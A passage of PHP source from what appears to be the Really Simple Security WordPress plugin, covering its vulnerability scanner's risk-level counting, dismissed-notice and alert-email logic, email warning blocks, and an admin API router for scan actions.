			        if ( version_compare( $Version, $version_from, $operator_from ) && version_compare( $Version, $version_to, $operator_to ) ) {
				        $filtered_vulnerabilities[] = $vulnerability;
			        }
		        }

	        }
	        return $filtered_vulnerabilities;
        }

	    /**
         * Get count of risk occurrence for each risk level
	     * @return array
	     */
        public function count_risk_levels(): array {
            $plugins = $this->workable_plugins;
            $risk_levels = array();
            foreach ($plugins as $plugin) {
                if (isset($plugin['risk_level'])) {
                    if (isset($risk_levels[$plugin['risk_level']])) {
                        $risk_levels[$plugin['risk_level']]++;
                    } else {
                        $risk_levels[$plugin['risk_level']] = 1;
                    }
                }
            }

            return $risk_levels;
        }

	    /**
	     * check if a a dismissed notice should be reset
         *
	     * @param string $risk_level
	     *
	     * @return bool
	     */
	    private function should_reset_notification(string $risk_level): bool {
		    $plugins = $this->workable_plugins;
		    $vulnerable_plugins = array();
		    foreach ($plugins as $plugin) {
			    if (isset($plugin['risk_level']) && $plugin['risk_level'] === $risk_level) {
				    $vulnerable_plugins[] = $plugin['rss_identifier'];
			    }
		    }
		    $dismissed_for = get_option("rsssl_{$risk_level}_notification_dismissed_for",[]);
		    //cleanup. Check if plugins in mail_sent_for exist in the $plugins array
		    foreach ($dismissed_for as $key => $rss_identifier) {
			    if ( ! in_array($rss_identifier, $vulnerable_plugins) ) {
				    unset($dismissed_for[$key]);
			    }
		    }

		    $diff = array_diff($vulnerable_plugins, $dismissed_for);
		    foreach ($diff as $rss_identifier) {
			    if (!in_array($rss_identifier, $dismissed_for)){
				    $dismissed_for[] = $rss_identifier;
			    }
		    }
		    //add the new plugins to the $dismissed_for array
		    update_option("rsssl_{$risk_level}_notification_dismissed_for", $dismissed_for, false );
		    return !empty($diff);
	    }

	    /**
         * check if a new mail should be sent about vulnerabilities
	     * @return bool
	     */
        private function should_send_mail(): bool {
            $plugins = $this->workable_plugins;
            $vulnerable_plugins = array();
            foreach ($plugins as $plugin) {
                if (isset($plugin['risk_level'])) {
                    $vulnerable_plugins[] = $plugin['rss_identifier'];
                }
            }

            $mail_sent_for = get_option('rsssl_vulnerability_mail_sent_for',[]);
            //cleanup. Check if plugins in mail_sent_for exist in the $plugins array
            foreach ($mail_sent_for as $key => $rss_identifier) {
                if ( ! in_array($rss_identifier, $vulnerable_plugins) ) {
                    unset($mail_sent_for[$key]);
                }
            }

            $diff = array_diff($vulnerable_plugins, $mail_sent_for);
            foreach ($diff as $rss_identifier) {
                if (!in_array($rss_identifier, $mail_sent_for)){
	                $mail_sent_for[] = $rss_identifier;
                }
            }

            //add the new plugins to the mail_sent_for array
	        update_option('rsssl_vulnerability_mail_sent_for',$mail_sent_for, false );
            return !empty($diff);
        }

	    /**
         * Get id by risk level
	     * @param array  $vulnerabilities
	     * @param string $risk_level
	     *
	     * @return mixed|void
	     */
        private function getLinkedUUID( array $vulnerabilities, string $risk_level)
        {
            foreach ($vulnerabilities as $vulnerability) {
                if ($vulnerability->severity === $risk_level) {
                    return $vulnerability->rss_identifier;
                }
            }
        }

        private function getLinkedDate($vulnerabilities, string $risk_level)
        {
            foreach ($vulnerabilities as $vulnerability) {
                if ($vulnerability->severity === $risk_level) {
                    //we return the date in a readable format
                    return date(get_option('date_format'), strtotime($vulnerability->published_date));
                }
            }
        }

	    /**
         * Send email warning
	     * @return void
	     */
        public function send_vulnerability_mail(): void {
	        if ( ! rsssl_admin_logged_in() ) {
		        return;
	        }

            //first we check if the user wants to receive emails
            if ( !rsssl_get_option('send_notifications_email') ) {
                return;
            }

            $level_for_email = rsssl_get_option('vulnerability_notification_email_admin');
            if ( !$level_for_email || $level_for_email === '*' ) {
                return;
            }

            //now based on the risk level we send a different email
            $risk_levels = $this->count_risk_levels();
            $total = 0;
            $blocks = [];
            foreach ($risk_levels as $risk_level => $count) {
                if ( $this->risk_levels[$risk_level] >= $this->risk_levels[$level_for_email] ) {
                    $blocks[] = $this->createBlock($risk_level, $count);
                    $total    += $count;
                }
            }

            //date format is named month day year
            $mailer = new rsssl_mailer();
            $mailer->subject = sprintf(__("Vulnerability Alert: %s", "really-simple-ssl"), $this->site_url() );
	        $mailer->title = sprintf(_n("%s: %s vulnerability found", "%s: %s vulnerabilities found", $total, "really-simple-ssl"), $this->date(), $total);
            $message = sprintf(__("This is a vulnerability alert from Really Simple Security for %s. ","really-simple-ssl"), $this->domain() );
            $mailer->message = $message;
            $mailer->warning_blocks = $blocks;
            if ($total > 0) {
                //if for some reason the total is 0, we don't send an email
                $mailer->send_mail();
            }
        }

	    /**
         * Create an email block by risk level
	     *
	     * @param string $risk_level
	     * @param int    $count
	     *
	     * @return array
	     */
        protected function createBlock(string $risk_level, int $count): array
        {
            $plugin_name = '';
            //if we have only one plugin with this risk level, we can show the plugin name
            //we search it in the list
            if ( $count===1 ){
                $plugins = $this->workable_plugins;
                foreach ($plugins as $plugin) {
                    if (isset($plugin['risk_level']) && $plugin['risk_level'] === $risk_level) {
                        $plugin_name = $plugin['Name'];
                    }
                }
            }

            $risk = $this->risk_naming[$risk_level];
	        $title = $this->get_warning_string($risk_level, $count);
	        $message = $count === 1 ? sprintf(__("A %s vulnerability is found in %s.", "really-simple-ssl"),$risk, $plugin_name) : sprintf(__("Multiple %s vulnerabilities have been found.", "really-simple-ssl"), $risk);

            return [
                'title' => $title,
                'message' => $message . ' ' .
                             __('Based on your settings, Really Simple Security will take appropriate action, or you will need to solve it manually.','really-simple-ssl') .' '.
                             sprintf(__('Get more information from the Really Simple Security dashboard on %s'), $this->domain() ),
                'url' => rsssl_admin_url( [], '#settings/vulnerabilities_notifications'),
            ];
        }

	    /**
	     * @param string $risk_level
	     * @param int    $count
	     *
	     * @return string
	     */
        public function get_warning_string( string $risk_level, int $count): string {
            switch ($risk_level){
                case 'c':
                    $warning = sprintf(_n('You have %s critical vulnerability', 'You have %s critical vulnerabilities', $count, 'really-simple-ssl'), $count);
                    break;
                case 'h':
                    $warning = sprintf(_n('You have %s high-risk vulnerability', 'You have %s high-risk vulnerabilities', $count, 'really-simple-ssl'), $count);
                    break;
                case 'm':
                    $warning = sprintf(_n('You have %s medium-risk vulnerability', 'You have %s medium-risk vulnerabilities', $count, 'really-simple-ssl'), $count);
                    break;
                default:
	                $warning = sprintf(_n('You have %s low-risk vulnerability', 'You have %s low-risk vulnerabilities', $count, 'really-simple-ssl'), $count);
                    break;
            }
            return $warning;
        }

	    /**
	     * Get a nicely formatted date for today's date
	     *
	     * @return string
	     */
	    public function date(): string {
		    return date_i18n( get_option( 'date_format' ));
	    }

        /**
         * Get the domain name in a clickable format
         *
         * @return string
         */
	    public function domain(): string {
		    return '<a href="'.$this->site_url().'" target="_blank" rel="noopener noreferrer">'.$this->site_url().'</a>';
	    }

	    /**
         * Cron triggers may sometimes result in http URL's, even though SSL is enabled in Really Simple Security.
         * We ensure that the URL is returned with https if SSL is enabled.
         *
	     * @return string
	     */
        public function site_url(): string {
            $ssl_enabled = rsssl_get_option('ssl_enabled') || is_ssl();
            $scheme = $ssl_enabled ? 'https' : 'http';
            return get_site_url(null, '', $scheme);
        }

    }

    //we initialize the class
    //add_action('init', array(rsssl_vulnerabilities::class, 'instance'));
    if ( !defined('rsssl_pro') ) {
	    $vulnerabilities = new rsssl_vulnerabilities();
    }
}

#########################################################################################
# Functions for the vulnerability scanner   									        #
# These functions are used in the vulnerability scanner like the notices and the api's  #
#########################################################################################
//we clear all the cache when the vulnerability scanner is enabled



function rsssl_vulnerabilities_api( array $response, string $action, $data ): array {
	if ( ! rsssl_user_can_manage() ) {
		return $response;
	}
	switch ($action) {
		case 'vulnerabilities_test_notification':
			//creating a random string based on time.
			$random_string = md5( time() );
			update_option( 'test_vulnerability_tester', $random_string, false );
            //clear admin notices cache
			delete_option('rsssl_admin_notices');
			$response = rsssl_vulnerabilities::testGenerator();
			break;
		case 'vulnerabilities_scan_files':
			$response = rsssl_vulnerabilities::firstRun();
			break;
		case 'vulnerabilities_measures_get':
			$response = ( new rsssl_vulnerabilities )->measures_data();
			break;
		case 'vulnerabilities_measures_set':
			$response = ( new rsssl_vulnerabilities )->measures_set($data);
			break;
	}

	return $response;
}
add_filter( 'rsssl_do_action', 'rsssl_vulnerabilities_api', 10, 3 );

/* End of Routing and API's */